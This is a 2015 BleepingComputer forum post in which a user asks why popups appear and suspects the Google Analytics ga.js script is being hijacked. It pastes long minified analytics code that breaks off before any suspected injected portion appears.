Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.

Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Google Analytics Hijack??

• Please log in to reply
4 replies to this topic

#1 74gee

74gee

• Members
  • 3 posts
  •  
  • Local time:05:39 PM

Posted 27 February 2015 - 01:22 AM

I've found popups on many web pages and after some investigation I've found the javascript returned by google analytics to be the culprit.

It seems as if requests to http://www.google-analytics.com/ga.js are being appended with additional code - see below.

This is affecting all my browsers: Firefox, Chrome and Opera (current versions) and also if I fetch the script with Curl.

Does anyone know what might be causing this and/or how to get rid of it?

Full response of http://www.google-analytics.com/ga.js

(function(){var aa=encodeURIComponent,ba=Infinity,ca=setTimeout,da=isNaN,m=Math,ea=decodeURIComponent;function Ie(a,b){return a.onload=b}function Je(a,b){return a.onerror=b}function ha(a,b){return a.name=b}
var p="replace",la="floor",ma="charAt",oa="match",pa="port",qa="createElement",g="getTime",u="host",v="toString",y="split",ta="stopPropagation",z="location",va="search",A="protocol",xa="href",ya="apply",n="push",ia="test",ja="slice",ka="load",na="value",q="indexOf",ra="path",r="name",w="length",x="prototype",sa="clientWidth",ua="scope",wa="clientHeight",B="substring",za="navigator",C="join",D="toLowerCase",E;function Aa(a,b){switch(b){case 0:return""+a;case 1:return 1*a;case 2:return!!a;case 3:return 1E3*a}return a}function Ba(a){return"function"==typeof a}function Ca(a){return void 0!=a&&-1<(a.constructor+"")[q]("String")}function F(a,b){return void 0==a||"-"==a&&!b||""==a}function Da(a){if(!a||""==a)return"";for(;a&&-1<" \n\r\t"[q](a[ma](0));)a=a[B](1);for(;a&&-1<" \n\r\t"[q](a[ma](a[w]-1));)a=a[B](0,a[w]-1);return a}function Ea(){return m.round(2147483647*m.random())}function Fa(){}
function G(a,b){if(aa instanceof Function)return b?encodeURI(a):aa(a);H(68);return escape(a)}function I(a){a=a[y]("+")[C](" ");if(ea instanceof Function)try{return ea(a)}catch(b){H(17)}else H(68);return unescape(a)}var Ga=function(a,b,c,d){a.addEventListener?a.addEventListener(b,c,!!d):a.attachEvent&&a.attachEvent("on"+b,c)},Ha=function(a,b,c,d){a.removeEventListener?a.removeEventListener(b,c,!!d):a.detachEvent&&a.detachEvent("on"+b,c)};
function Ia(a,b){if(a){var c=J[qa]("script");c.type="text/javascript";c.async=!0;c.src=a;c.id=b;var d=J.getElementsByTagName("script")[0];d.parentNode.insertBefore(c,d);return c}}function K(a){return a&&0<a[w]?a[0]:""}function L(a){var b=a?a[w]:0;return 0<b?a[b-1]:""}var Ja=function(){this.prefix="ga.";this.R={}};Ja[x].set=function(a,b){this.R[this.prefix+a]=b};Ja[x].get=function(a){return this.R[this.prefix+a]};Ja[x].contains=function(a){return void 0!==this.get(a)};function Ka(a){0==a[q]("www.")&&(a=a[B](4));return a[D]()}function La(a,b){var c,d={url:a,protocol:"http",host:"",path:"",d:new Ja,anchor:""};if(!a)return d;c=a[q]("://");0<=c&&(d.protocol=a[B](0,c),a=a[B](c+3));c=a[va]("/|\\?|#");if(0<=c)d.host=a[B](0,c)[D](),a=a[B](c);else return d.host=a[D](),d;c=a[q]("#");0<=c&&(d.anchor=a[B](c+1),a=a[B](0,c));c=a[q]("?");0<=c&&(Na(d.d,a[B](c+1)),a=a[B](0,c));d.anchor&&b&&Na(d.d,d.anchor);a&&"/"==a[ma](0)&&(a=a[B](1));d.path=a;return d}
function Oa(a,b){function c(a){var b=(a.hostname||"")[y](":")[0][D](),c=(a[A]||"")[D](),c=1*a[pa]||("http:"==c?80:"https:"==c?443:"");a=a.pathname||"";0==a[q]("/")||(a="/"+a);return[b,""+c,a]}var d=b||J[qa]("a");d.href=J[z][xa];var e=(d[A]||"")[D](),f=c(d),Be=d[va]||"",k=e+"//"+f[0]+(f[1]?":"+f[1]:"");0==a[q]("//")?a=e+a:0==a[q]("/")?a=k+a:a&&0!=a[q]("?")?0>a[y]("/")[0][q](":")&&(a=k+f[2][B](0,f[2].lastIndexOf("/"))+"/"+a):a=k+f[2]+(a||Be);d.href=a;e=c(d);return{protocol:(d[A]||"")[D](),host:e[0],
port:e[1],path:e[2],Oa:d[va]||"",url:a||""}}function Na(a,b){function c(b,c){a.contains(b)||a.set(b,[]);a.get(b)[n](c)}for(var d=Da(b)[y]("&"),e=0;e<d[w];e++)if(d[e]){var f=d[e][q]("=");0>f?c(d[e],"1"):c(d[e][B](0,f),d[e][B](f+1))}}function Pa(a,b){if(F(a)||"["==a[ma](0)&&"]"==a[ma](a[w]-1))return"-";var c=J.domain;return a[q](c+(b&&"/"!=b?b:""))==(0==a[q]("http://")?7:0==a[q]("https://")?8:0)?"0":a};var Qa=0;function Ra(a,b,c){1<=Qa||1<=100*m.random()||ld()||(a=["utmt=error","utmerr="+a,"utmwv=5.6.0","utmn="+Ea(),"utmsp=1"],b&&a[n]("api="+b),c&&a[n]("msg="+G(c[B](0,100))),M.w&&a[n]("aip=1"),Sa(a[C]("&")),Qa++)};var Ta=0,Ua={};function N(a){return Va("x"+Ta++,a)}function Va(a,b){Ua[a]=!!b;return a}
var Wa=N(),Xa=Va("anonymizeIp"),Ya=N(),$a=N(),ab=N(),bb=N(),O=N(),P=N(),cb=N(),db=N(),eb=N(),fb=N(),gb=N(),hb=N(),ib=N(),jb=N(),kb=N(),lb=N(),nb=N(),ob=N(),pb=N(),qb=N(),rb=N(),sb=N(),tb=N(),ub=N(),vb=N(),wb=N(),xb=N(),yb=N(),zb=N(),Ab=N(),Bb=N(),Cb=N(),Db=N(),Eb=N(),Fb=N(!0),Gb=Va("currencyCode"),Hb=Va("page"),Ib=Va("title"),Jb=N(),Kb=N(),Lb=N(),Mb=N(),Nb=N(),Ob=N(),Pb=N(),Qb=N(),Rb=N(),Q=N(!0),Sb=N(!0),Tb=N(!0),Ub=N(!0),Vb=N(!0),Wb=N(!0),Zb=N(!0),$b=N(!0),ac=N(!0),bc=N(!0),cc=N(!0),R=N(!0),dc=N(!0),
ec=N(!0),fc=N(!0),gc=N(!0),hc=N(!0),ic=N(!0),jc=N(!0),S=N(!0),kc=N(!0),lc=N(!0),mc=N(!0),nc=N(!0),oc=N(!0),pc=N(!0),qc=N(!0),rc=Va("campaignParams"),sc=N(),tc=Va("hitCallback"),uc=N();N();var vc=N(),wc=N(),xc=N(),yc=N(),zc=N(),Ac=N(),Bc=N(),Cc=N(),Dc=N(),Ec=N(),Fc=N(),Gc=N(),Hc=N(),Ic=N();N();var Mc=N(),Nc=N(),Yb=N(),Jc=N(),Kc=N(),Lc=Va("utmtCookieName"),Cd=Va("displayFeatures"),Oc=N(),of=Va("gtmid"),Oe=Va("uaName"),Pe=Va("uaDomain"),Qe=Va("uaPath");var Re=function(){function a(a,c,d){T($[x],a,c,d)}a("_createTracker",$[x].r,55);a("_getTracker",$[x].oa,0);a("_getTrackerByName",$[x].u,51);a("_getTrackers",$[x].pa,130);a("_anonymizeIp",$[x].aa,16);a("_forceSSL",$[x].la,125);a("_getPlugin",Pc,120)},Se=function(){function a(a,c,d){T(U[x],a,c,d)}Qc("_getName",$a,58);Qc("_getAccount",Wa,64);Qc("_visitCode",Q,54);Qc("_getClientInfo",ib,53,1);Qc("_getDetectTitle",lb,56,1);Qc("_getDetectFlash",jb,65,1);Qc("_getLocalGifPath",wb,57);Qc("_getServiceMode",
xb,59);V("_setClientInfo",ib,66,2);V("_setAccount",Wa,3);V("_setNamespace",Ya,48);V("_setAllowLinker",fb,11,2);V("_setDetectFlash",jb,61,2);V("_setDetectTitle",lb,62,2);V("_setLocalGifPath",wb,46,0);V("_setLocalServerMode",xb,92,void 0,0);V("_setRemoteServerMode",xb,63,void 0,1);V("_setLocalRemoteServerMode",xb,47,void 0,2);V("_setSampleRate",vb,45,1);V("_setCampaignTrack",kb,36,2);V("_setAllowAnchor",gb,7,2);V("_setCampNameKey",ob,41);V("_setCampContentKey",tb,38);V("_setCampIdKey",nb,39);V("_setCampMediumKey",
rb,40);V("_setCampNOKey",ub,42);V("_setCampSourceKey",qb,43);V("_setCampTermKey",sb,44);V("_setCampCIdKey",pb,37);V("_setCookiePath",P,9,0);V("_setMaxCustomVariables",yb,0,1);V("_setVisitorCookieTimeout",cb,28,1);V("_setSessionCookieTimeout",db,26,1);V("_setCampaignCookieTimeout",eb,29,1);V("_setReferrerOverride",Jb,49);V("_setSiteSpeedSampleRate",Dc,132);a("_trackPageview",U[x].Fa,1);a("_trackEvent",U[x].F,4);a("_trackPageLoadTime",U[x].Ea,100);a("_trackSocial",U[x].Ga,104);a("_trackTrans",U[x].Ia,
18);a("_sendXEvent",U[x].t,78);a("_createEventTracker",U[x].ia,74);a("_getVersion",U[x].qa,60);a("_setDomainName",U[x].B,6);a("_setAllowHash",U[x].va,8);a("_getLinkerUrl",U[x].na,52);a("_link",U[x].link,101);a("_linkByPost",U[x].ua,102);a("_setTrans",U[x].za,20);a("_addTrans",U[x].$,21);a("_addItem",U[x].Y,19);a("_clearTrans",U[x].ea,105);a("_setTransactionDelim",U[x].Aa,82);a("_setCustomVar",U[x].wa,10);a("_deleteCustomVar",U[x].ka,35);a("_getVisitorCustomVar",U[x].ra,50);a("_setXKey",U[x].Ca,83);
a("_setXValue",U[x].Da,84);a("_getXKey",U[x].sa,76);a("_getXValue",U[x].ta,77);a("_clearXKey",U[x].fa,72);a("_clearXValue",U[x].ga,73);a("_createXObj",U[x].ja,75);a("_addIgnoredOrganic",U[x].W,15);a("_clearIgnoredOrganic",U[x].ba,97);a("_addIgnoredRef",U[x].X,31);a("_clearIgnoredRef",U[x].ca,32);a("_addOrganic",U[x].Z,14);a("_clearOrganic",U[x].da,70);a("_cookiePathCopy",U[x].ha,30);a("_get",U[x].ma,106);a("_set",U[x].xa,107);a("_addEventListener",U[x].addEventListener,108);a("_removeEventListener",
U[x].removeEventListener,109);a("_addDevId",U[x].V);a("_getPlugin",Pc,122);a("_setPageGroup",U[x].ya,126);a("_trackTiming",U[x].Ha,124);a("_initData",U[x].v,2);a("_setVar",U[x].Ba,22);V("_setSessionTimeout",db,27,3);V("_setCookieTimeout",eb,25,3);V("_setCookiePersistence",cb,24,1);a("_setAutoTrackOutbound",Fa,79);a("_setTrackOutboundSubdomains",Fa,81);a("_setHrefExamineLimit",Fa,80)};function Pc(a){var b=this.plugins_;if(b)return b.get(a)}
var T=function(a,b,c,d){a[b]=function(){try{return void 0!=d&&H(d),c[ya](this,arguments)}catch(a){throw Ra("exc",b,a&&a[r]),a;}}},Qc=function(a,b,c,d){U[x][a]=function(){try{return H(c),Aa(this.a.get(b),d)}catch(e){throw Ra("exc",a,e&&e[r]),e;}}},V=function(a,b,c,d,e){U[x][a]=function(f){try{H(c),void 0==e?this.a.set(b,Aa(f,d)):this.a.set(b,e)}catch(Be){throw Ra("exc",a,Be&&Be[r]),Be;}}},Te=function(a,b){return{type:b,target:a,stopPropagation:function(){throw"aborted";}}};var Rc=new RegExp(/(^|\.)doubleclick\.net$/i),Sc=function(a,b){return Rc[ia](J[z].hostname)?!0:"/"!==b?!1:0!=a[q]("www.google.")&&0!=a[q](".google.")&&0!=a[q]("google.")||-1<a[q]("google.org")?!1:!0},Tc=function(a){var b=a.get(bb),c=a.c(P,"/");Sc(b,c)&&a[ta]()};var Zc=function(){var a={},b={},c=new Uc;this.g=function(a,b){c.add(a,b)};var d=new Uc;this.e=function(a,b){d.add(a,b)};var e=!1,f=!1,Be=!0;this.T=function(){e=!0};this.j=function(a){this[ka]();this.set(sc,a,!0);a=new Vc(this);e=!1;d.cb(this);e=!0;b={};this.n();a.Ja()};this.load=function(){e&&(e=!1,this.Ka(),Wc(this),f||(f=!0,c.cb(this),Xc(this),Wc(this)),e=!0)};this.n=function(){if(e)if(f)e=!1,Xc(this),e=!0;else this[ka]()};this.get=function(c){Ua[c]&&this[ka]();return void 0!==b[c]?b[c]:a[c]};this.set=
function(c,d,e){Ua[c]&&this[ka]();e?b[c]=d:a[c]=d;Ua[c]&&this.n()};this.Za=function(b){a[b]=this.b(b,0)+1};this.b=function(a,b){var c=this.get(a);return void 0==c||""===c?b:1*c};this.c=function(a,b){var c=this.get(a);return void 0==c?b:c+""};this.Ka=function(){if(Be){var b=this.c(bb,""),c=this.c(P,"/");Sc(b,c)||(a[O]=a[hb]&&""!=b?Yc(b):1,Be=!1)}}};Zc[x].stopPropagation=function(){throw"aborted";};
var Vc=function(a){var b=this;this.q=0;var c=a.get(tc);this.Ua=function(){0<b.q&&c&&(b.q--,b.q||c())};this.Ja=function(){!b.q&&c&&ca(c,10)};a.set(uc,b,!0)};function $c(a,b){b=b||[];for(var c=0;c<b[w];c++){var d=b[c];if(""+a==d||0==d[q](a+"."))return d}return"-"}
var bd=function(a,b,c){c=c?"":a.c(O,"1");b=b[y](".");if(6!==b[w]||ad(b[0],c))return!1;c=1*b[1];var d=1*b[2],e=1*b[3],f=1*b[4];b=1*b[5];if(!(0<=c&&0<d&&0<e&&0<f&&0<=b))return!1;a.set(Q,c);a.set(Vb,d);a.set(Wb,e);a.set(Zb,f);a.set($b,b);return!0},cd=function(a){var b=a.get(Q),c=a.get(Vb),d=a.get(Wb),e=a.get(Zb),f=a.b($b,1);return[a.b(O,1),void 0!=b?b:"-",c||"-",d||"-",e||"-",f][C](".")},dd=function(a){return[a.b(O,1),a.b(cc,0),a.b(R,1),a.b(dc,0)][C](".")},ed=function(a,b,c){c=c?"":a.c(O,"1");var d=
b[y](".");if(4!==d[w]||ad(d[0],c))d=null;a.set(cc,d?1*d[1]:0);a.set(R,d?1*d[2]:10);a.set(dc,d?1*d[3]:a.get(ab));return null!=d||!ad(b,c)},fd=function(a,b){var c=G(a.c(Tb,"")),d=[],e=a.get(Fb);if(!b&&e){for(var f=0;f<e[w];f++){var Be=e[f];Be&&1==Be[ua]&&d[n](f+"="+G(Be[r])+"="+G(Be[na])+"=1")}0<d[w]&&(c+="|"+d[C]("^"))}return c?a.b(O,1)+"."+c:null},gd=function(a,b,c){c=c?"":a.c(O,"1");b=b[y](".");if(2>b[w]||ad(b[0],c))return!1;b=b[ja](1)[C](".")[y]("|");0<b[w]&&a.set(Tb,I(b[0]));if(1>=b[w])return!0;
b=b[1][y](-1==b[1][q](",")?"^":",");for(c=0;c<b[w];c++){var d=b[c][y]("=");if(4==d[w]){var e={};ha(e,I(d[1]));e.value=I(d[2]);e.scope=1;a.get(Fb)[d[0]]=e}}return!0},hd=function(a,b){var c=Ue(a,b);return c?[a.b(O,1),a.b(ec,0),a.b(fc,1),a.b(gc,1),c][C]("."):""},Ue=function(a){function b(b,e){if(!F(a.get(b))){var f=a.c(b,""),f=f[y](" ")[C]("%20"),f=f[y]("+")[C]("%20");c[n](e+"="+f)}}var c=[];b(ic,"utmcid");b(nc,"utmcsr");b(S,"utmgclid");b(kc,"utmgclsrc");b(lc,"utmdclid");b(mc,"utmdsid");b(jc,"utmccn");
b(oc,"utmcmd");b(pc,"utmctr");b(qc,"utmcct");return c[C]("|")},id=function(a,b,c){c=c?"":a.c(O,"1");b=b[y](".");if(5>b[w]||ad(b[0],c))return a.set(ec,void 0),a.set(fc,void 0),a.set(gc,void 0),a.set(ic,void 0),a.set(jc,void 0),a.set(nc,void 0),a.set(oc,void 0),a.set(pc,void 0),a.set(qc,void 0),a.set(S,void 0),a.set(kc,void 0),a.set(lc,void 0),a.set(mc,void 0),!1;a.set(ec,1*b[1]);a.set(fc,1*b[2]);a.set(gc,1*b[3]);Ve(a,b[ja](4)[C]("."));return!0},Ve=function(a,b){function c(a){return(a=b[oa](a+"=(.*?)(?:\\|utm|$)"))&&
2==a[w]?a[1]:void 0}function d(b,c){c?(c=e?I(c):c[y]("%20")[C](" "),a.set(b,c)):a.set(b,void 0)}-1==b[q]("=")&&(b=I(b));var e="2"==c("utmcvr");d(ic,c("utmcid"));d(jc,c("utmccn"));d(nc,c("utmcsr"));d(oc,c("utmcmd"));d(pc,c("utmctr"));d(qc,c("utmcct"));d(S,c("utmgclid"));d(kc,c("utmgclsrc"));d(lc,c("utmdclid"));d(mc,c("utmdsid"))},ad=function(a,b){return b?a!=b:!/^\d+$/[ia](a)};var Uc=function(){this.filters=[]};Uc[x].add=function(a,b){this.filters[n]({name:a,s:b})};Uc[x].cb=function(a){try{for(var b=0;b<this.filters[w];b++)this.filters[b].s.call(W,a)}catch(c){}};function jd(a){100!=a.get(vb)&&a.get(Q)%1E4>=100*a.get(vb)&&a[ta]()}function kd(a){ld(a.get(Wa))&&a[ta]()}function md(a){"file:"==J[z][A]&&a[ta]()}function Ge(a){He()&&a[ta]()}function nd(a){a.get(Ib)||a.set(Ib,J.title,!0);a.get(Hb)||a.set(Hb,J[z].pathname+J[z][va],!0)}
function lf(a){a.get(Wa)&&"UA-XXXXX-X"!=a.get(Wa)||a[ta]()};var od=new function(){var a=[];this.set=function(b){a[b]=!0};this.Xa=function(){for(var b=[],c=0;c<a[w];c++)a[c]&&(b[m[la](c/6)]=b[m[la](c/6)]^1<<c%6);for(c=0;c<b[w];c++)b[c]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"[ma](b[c]||0);return b[C]("")+"~"}};function H(a){od.set(a)};var W=window,J=document,ld=function(a){var b=W._gaUserPrefs;if(b&&b.ioo&&b.ioo()||a&&!0===W["ga-disable-"+a])return!0;try{var c=W.external;if(c&&c._gaUserPrefs&&"oo"==c._gaUserPrefs)return!0}catch(d){}return!1},He=function(){return W[za]&&"preview"==W[za].loadPurpose},We=function(a,b){ca(a,b)},pd=function(a){var b=[],c=J.cookie[y](";");a=new RegExp("^\\s*"+a+"=\\s*(.*?)\\s*$");for(var d=0;d<c[w];d++){var e=c[d][oa](a);e&&b[n](e[1])}return b},X=function(a,b,c,d,e,f){e=ld(e)?!1:Sc(d,c)?!1:He()?!1:!0;
e&&((b=mf(b))&&2E3<b[w]&&(b=b[B](0,2E3),H(69)),a=a+"="+b+"; path="+c+"; ",f&&(a+="expires="+(new Date((new Date)[g]()+f)).toGMTString()+"; "),d&&(a+="domain="+d+";"),J.cookie=a)},mf=function(a){if(!a)return a;var b=a[q](";");-1!=b&&(a=a[B](0,b),H(141));if(!(0<=W[za].userAgent[q]("Firefox")))return a;a=a[p](/\n|\r/g," ");for(var b=0,c=a[w];b<c;++b){var d=a.charCodeAt(b)&255;if(10==d||13==d)a=a[B](0,b)+"?"+a[B](b+1)}return a};var qd,rd,sd=function(){if(!qd){var a={},b=W[za],c=W.screen;a.Q=c?c.width+"x"+c.height:"-";a.P=c?c.colorDepth+"-bit":"-";a.language=(b&&(b.language||b.browserLanguage)||"-")[D]();a.javaEnabled=b&&b.javaEnabled()?1:0;a.characterSet=J.characterSet||J.charset||"-";try{var d;var e=J.documentElement,f=J.body,Be=f&&f[sa]&&f[wa],b=[];e&&e[sa]&&e[wa]&&("CSS1Compat"===J.compatMode||!Be)?b=[e[sa],e[wa]]:Be&&(b=[f[sa],f[wa]]);d=0>=b[0]||0>=b[1]?"":b[C]("x");a.Wa=d}catch(k){H(135)}qd=a}},td=function(){sd();for(var a=
qd,b=W[za],a=b.appName+b.version+a.language+b.platform+b.userAgent+a.javaEnabled+a.Q+a.P+(J.cookie?J.cookie:"")+(J.referrer?J.referrer:""),b=a[w],c=W.history[w];0<c;)a+=c--^b++;return Yc(a)},ud=function(a){sd();var b=qd;a.set(Lb,b.Q);a.set(Mb,b.P);a.set(Pb,b.language);a.set(Qb,b.characterSet);a.set(Nb,b.javaEnabled);a.set(Rb,b.Wa);if(a.get(ib)&&a.get(jb)){if(!(b=rd)){var c,d,e;d="ShockwaveFlash";if((b=(b=W[za])?b.plugins:void 0)&&0<b[w])for(c=0;c<b[w]&&!e;c++)d=b[c],-1<d[r][q]("Shockwave Flash")&&
(e=d.description[y]("Shockwave Flash ")[1]);else{d=d+"."+d;try{c=new ActiveXObject(d+".7"),e=c.GetVariable("$version")}catch(f){}if(!e)try{c=new ActiveXObject(d+".6"),e="WIN 6,0,21,0",c.AllowScriptAccess="always",e=c.GetVariable("$version")}catch(Be){}if(!e)try{c=new ActiveXObject(d),e=c.GetVariable("$version")}catch(k){}e&&(e=e[y](" ")[1][y](","),e=e[0]+"."+e[1]+" r"+e[2])}b=e?e:"-"}rd=b;a.set(Ob,rd)}else a.set(Ob,"-")};var vd=function(a){if(Ba(a))this.s=a;else{var b=a[0],c=b.lastIndexOf(":"),d=b.lastIndexOf(".");this.h=this.i=this.l="";-1==c&&-1==d?this.h=b:-1==c&&-1!=d?(this.i=b[B](0,d),this.h=b[B](d+1)):-1!=c&&-1==d?(this.l=b[B](0,c),this.h=b[B](c+1)):c>d?(this.i=b[B](0,d),this.l=b[B](d+1,c),this.h=b[B](c+1)):(this.i=b[B](0,d),this.h=b[B](d+1));this.k=a[ja](1);this.Ma=!this.l&&"_require"==this.h;this.J=!this.i&&!this.l&&"_provide"==this.h}},Y=function(){T(Y[x],"push",Y[x][n],5);T(Y[x],"_getPlugin",Pc,121);T(Y[x],
"_createAsyncTracker",Y[x].Sa,33);T(Y[x],"_getAsyncTracker",Y[x].Ta,34);this.I=new Ja;this.p=[]};E=Y[x];E.Na=function(a,b,c){var d=this.I.get(a);if(!Ba(d))return!1;b.plugins_=b.plugins_||new Ja;b.plugins_.set(a,new d(b,c||{}));return!0};E.push=function(a){var b=Z.Va[ya](this,arguments),b=Z.p.concat(b);for(Z.p=[];0<b[w]&&!Z.O(b[0])&&!(b.shift(),0<Z.p[w]););Z.p=Z.p.concat(b);return 0};E.Va=function(a){for(var b=[],c=0;c<arguments[w];c++)try{var d=new vd(arguments[c]);d.J?this.O(d):b[n](d)}catch(e){}return b};
E.O=function(a){try{if(a.s)a.s[ya](W);else if(a.J)this.I.set(a.k[0],a.k[1]);else{var b="_gat"==a.i?M:"_gaq"==a.i?Z:M.u(a.i);if(a.Ma){if(!this.Na(a.k[0],b,a.k[2])){if(!a.Pa){var c=Oa(""+a.k[1]);var d=c[A],e=J[z][A];var f;if(f="https:"==d||d==e?!0:"http:"!=d?!1:"http:"==e)t:{var Be=Oa(J[z][xa]);if(!(c.Oa||0<=c.url[q]("?")||0<=c[ra][q]("://")||c[u]==Be[u]&&c[pa]==Be[pa]))for(var k="http:"==c[A]?80:443,s=M.S,b=0;b<s[w];b++)if(c[u]==s[b][0]&&(c[pa]||k)==(s[b][1]||k)&&0==c[ra][q](s[b][2])){f=!0;break t}f=
!1}f&&!ld()&&(a.Pa=Ia(c.url))}return!0}}else a.l&&(b=b.plugins_.get(a.l)),b[a.h][ya](b,a.k)}}catch(t){}};E.Sa=function(a,b){return M.r(a,b||"")};E.Ta=function(a){return M.u(a)};var yd=function(){function a(a,b,c,d){void 0==f[a]&&(f[a]={});void 0==f[a][b]&&(f[a][b]=[]);f[a][b][c]=d}function b(a,b,c){if(void 0!=f[a]&&void 0!=f[a][b])return f[a][b][c]}function c(a,b){if(void 0!=f[a]&&void 0!=f[a][b]){f[a][b]=void 0;var c=!0,d;for(d=0;d<Be[w];d++)if(void 0!=f[a][Be[d]]){c=!1;break}c&&(f[a]=void 0)}}function d(a){var b="",c=!1,d,e;for(d=0;d<Be[w];d++)if(e=a[Be[d]],void 0!=e){c&&(b+=Be[d]);for(var c=[],f=void 0,Bd=void 0,Bd=0;Bd<e[w];Bd++)if(void 0!=e[Bd]){f="";1!=Bd&&void 0==
e[Bd-1]&&(f+=Bd[v]()+"!");for(var fa=e[Bd],Ke="",Le=void 0,Me=void 0,ga=void 0,Le=0;Le<fa[w];Le++)Me=fa[ma](Le),ga=k[Me],Ke+=void 0!=ga?ga:Me;f+=Ke;c[n](f)}b+="("+c[C]("*")+")";c=!1}else c=!0;return b}var e=this,f=[],Be=["k","v"],k={"'":"'0",")":"'1","*":"'2","!":"'3"};e.Ra=function(a){return void 0!=f[a]};e.A=function(){for(var a="",b=0;b<f[w];b++)void 0!=f[b]&&(a+=b[v]()+d(f[b]));return a};e.Qa=function(a){if(void 0==a)return e.A();for(var b=a.A(),c=0;c<f[w];c++)void 0==f[c]||a.Ra(c)||(b+=c[v]()+
d(f[c]));return b};e.f=function(b,c,d){if(!wd(d))return!1;a(b,"k",c,d);return!0};e.o=function(b,c,d){if(!xd(d))return!1;a(b,"v",c,d[v]());return!0};e.getKey=function(a,c){return b(a,"k",c)};e.N=function(a,c){return b(a,"v",c)};e.L=function(a){c(a,"k")};e.M=function(a){c(a,"v")};T(e,"_setKey",e.f,89);T(e,"_setValue",e.o,90);T(e,"_getKey",e.getKey,87);T(e,"_getValue",e.N,88);T(e,"_clearKey",e.L,85);T(e,"_clearValue",e.M,86)};function wd(a){return"string"==typeof a}
function xd(a){return!("number"==typeof a||void 0!=Number&&a instanceof Number)||m.round(a)!=a||da(a)||a==ba?!1:!0};var zd=function(a){var b=W.gaGlobal;a&&!b&&(W.gaGlobal=b={});return b},Ad=function(){var a=zd(!0).hid;null==a&&(a=Ea(),zd(!0).hid=a);return a},Dd=function(a){a.set(Kb,Ad());var b=zd();if(b&&b.dh==a.get(O)){var c=b.sid;c&&(a.get(ac)?H(112):H(132),a.set(Zb,c),a.get(Sb)&&a.set(Wb,c));b=b.vid;a.get(Sb)&&b&&(b=b[y]("."),a.set(Q,1*b[0]),a.set(Vb,1*b[1]))}};var Ed,Fd=function(a,b,c,d){var e=a.c(bb,""),f=a.c(P,"/");d=void 0!=d?d:a.b(cb,0);a=a.c(Wa,"");X(b,c,f,e,a,d)},Xc=function(a){var b=a.c(bb,"");a.b(O,1);var c=a.c(P,"/"),d=a.c(Wa,"");X("__utma",cd(a),c,b,d,a.get(cb));X("__utmb",dd(a),c,b,d,a.get(db));X("__utmc",""+a.b(O,1),c,b,d);var e=hd(a,!0);e?X("__utmz",e,c,b,d,a.get(eb)):X("__utmz","",c,b,"",-1);(e=fd(a,!1))?X("__utmv",e,c,b,d,a.get(cb)):X("__utmv","",c,b,"",-1)},Wc=function(a){var b=a.b(O,1);if(!bd(a,$c(b,pd("__utma"))))return a.set(Ub,!0),!1;
var c=!ed(a,$c(b,pd("__utmb")));a.set(bc,c);id(a,$c(b,pd("__utmz")));gd(a,$c(b,pd("__utmv")));Ed=!c;return!0},Gd=function(a){Ed||0<pd("__utmb")[w]||(X("__utmd","1",a.c(P,"/"),a.c(bb,""),a.c(Wa,""),1E4),0==pd("__utmd")[w]&&a[ta]())};var h=0,Jd=function(a){void 0==a.get(Q)?Hd(a):a.get(Ub)&&!a.get(Mc)?Hd(a):a.get(bc)&&Id(a)},Kd=function(a){a.get(hc)&&!a.get(ac)&&(Id(a),a.set(fc,a.get($b)))},Hd=function(a){h++;1<h&&H(137);var b=a.get(ab);a.set(Sb,!0);a.set(Q,Ea()^td(a)&2147483647);a.set(Tb,"");a.set(Vb,b);a.set(Wb,b);a.set(Zb,b);a.set($b,1);a.set(ac,!0);a.set(cc,0);a.set(R,10);a.set(dc,b);a.set(Fb,[]);a.set(Ub,!1);a.set(bc,!1)},Id=function(a){h++;1<h&&H(137);a.set(Wb,a.get(Zb));a.set(Zb,a.get(ab));a.Za($b);a.set(ac,!0);a.set(cc,
0);a.set(R,10);a.set(dc,a.get(ab));a.set(bc,!1)};var Ld="daum:q eniro:search_word naver:query pchome:q images.google:q google:q yahoo:p yahoo:q msn:q bing:q aol:query aol:q lycos:q lycos:query ask:q cnn:query virgilio:qs baidu:wd baidu:word alice:qs yandex:text najdi:q seznam:q rakuten:qt biglobe:q goo.ne:MT search.smt.docomo:MT onet:qt onet:q kvasir:q terra:query rambler:query conduit:q babylon:q search-results:q avg:q comcast:q incredimail:q startsiden:q go.mail.ru:q centrum.cz:q 360.cn:q sogou:query tut.by:query globo:q ukr:q so.com:q auone:q".split(" "),
Sd=function(a){if(a.get(kb)&&!a.get(Mc)){var b;b=!F(a.get(ic))||!F(a.get(nc))||!F(a.get(S))||!F(a.get(lc));for(var c={},d=0;d<Md[w];d++){var e=Md[d];c[e]=a.get(e)}(d=a.get(rc))?(H(149),e=new Ja,Na(e,d),d=e):d=La(J[z][xa],a.get(gb)).d;if("1"!=L(d.get(a.get(ub)))||!b)if(d=Xe(a,d)||Qd(a),d||b||!a.get(ac)||(Pd(a,void 0,"(direct)",void 0,void 0,void 0,"(direct)","(none)",void 0,void 0),d=!0),d&&(a.set(hc,Rd(a,c)),b="(direct)"==a.get(nc)&&"(direct)"==a.get(jc)&&"(none)"==a.get(oc),a.get(hc)||a.get(ac)&&
!b))a.set(ec,a.get(ab)),a.set(fc,a.get($b)),a.Za(gc)}},Xe=function(a,b){function c(c,d){d=d||"-";var e=L(b.get(a.get(c)));return e&&"-"!=e?I(e):d}var d=L(b.get(a.get(nb)))||"-",e=L(b.get(a.get(qb)))||"-",f=L(b.get(a.get(pb)))||"-",Be=L(b.get("gclsrc"))||"-",k=L(b.get("dclid"))||"-",s=c(ob,"(not set)"),t=c(rb,"(not set)"),Za=c(sb),Ma=c(tb);if(F(d)&&F(f)&&F(k)&&F(e))return!1;var mb=!F(f)&&!F(Be),mb=F(e)&&(!F(k)||mb),Xb=F(Za);if(mb||Xb){var Bd=Nd(a),Bd=La(Bd,!0);(Bd=Od(a,Bd))&&!F(Bd[1]&&!Bd[2])&&(mb&&
